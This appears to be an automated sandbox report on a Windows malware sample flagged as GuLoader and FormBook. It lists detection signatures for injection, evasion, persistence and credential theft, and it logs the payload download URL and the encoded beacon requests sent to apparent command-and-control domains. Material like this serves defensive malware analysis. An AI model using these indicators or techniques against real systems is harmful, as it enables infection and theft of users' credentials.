Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Analysis ID: 1431789
MD5: 4621fea50e1982e6f753efe7d1be2b35
SHA1: 46072b07bfa96583ed03149a04411cbcf04eadf9
SHA256: 6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
Tags: exe
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://kraljevikonaci.rs/ Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bin Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bin5? Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.binY Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bins Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: kraljevikonaci.rs Virustotal: Detection: 15% Perma Link
Source: https://kraljevikonaci.rs/ETfFmOW246.bin Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Virustotal: Detection: 60% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Virustotal: Detection: 57% Perma Link
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004065CE FindFirstFileA,FindClose, 0_2_004065CE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004027AA FindFirstFileA, 0_2_004027AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose, 14_2_003DB880
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then xor eax, eax 14_2_003C9430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 14_2_003D1DAF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 14_2_003D1DD0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 219.94.128.41 219.94.128.41
Source: Joe Sandbox View IP Address: 217.160.0.183 217.160.0.183
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ETfFmOW246.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: kraljevikonaci.rsCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic DNS traffic detected: DNS query: kraljevikonaci.rs
Source: global traffic DNS traffic detected: DNS query: www.ejbodyart.com
Source: global traffic DNS traffic detected: DNS query: www.jt-berger.store
Source: global traffic DNS traffic detected: DNS query: www.n-benriya002.com
Source: unknown HTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 195Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 55 30 36 6c 49 56 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 4b 77 4c 4c 2f 42 51 72 72 34 4a 69 7a 5a 76 5a 7a 38 49 42 65 41 76 2b 6a 6a 77 Data Ascii: U06lIV=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0KwLL/BQrr4JizZvZz8IBeAv+jjw
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:25:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:08 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:11 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Thu, 25 Apr 2024 17:26:14 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:26:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 